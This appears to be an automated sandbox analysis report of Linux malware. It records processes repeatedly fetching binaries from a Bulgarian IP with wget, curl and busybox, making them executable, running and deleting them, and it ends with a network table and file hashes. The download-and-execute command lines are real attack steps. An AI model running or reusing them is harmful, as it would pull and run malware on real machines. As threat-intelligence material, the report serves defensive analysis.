/usr/bin/curl
[curl -O http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/bin/chmod
[chmod 777 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK
[./2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/bin/rm
[rm 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/usr/bin/wget
[wget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/bin/chmod
[chmod 777 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4
[./EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/bin/rm
[rm EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/usr/bin/wget
[wget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/bin/chmod
[chmod 777 PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F
[./PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/bin/rm
[rm PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/usr/bin/wget
[wget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/bin/chmod
[chmod 777 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp
[./5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/bin/rm
[rm 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/usr/bin/wget
[wget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/bin/chmod
[chmod 777 zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2
[./zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/bin/rm
[rm zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/usr/bin/wget
[wget http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
/bin/chmod
[chmod 777 JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
/tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3
[./JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
/bin/rm
[rm JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
/usr/bin/wget
[wget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/bin/chmod
[chmod 777 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir
[./EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/bin/rm
[rm EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/usr/bin/wget
[wget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/bin/chmod
[chmod 777 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C
[./BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/bin/rm
[rm BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/usr/bin/wget
[wget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/bin/chmod
[chmod 777 rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7
[./rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/bin/rm
[rm rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/usr/bin/wget
[wget http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
memory/808-1-0xb66cc000-0xb66dd044-memory.dmp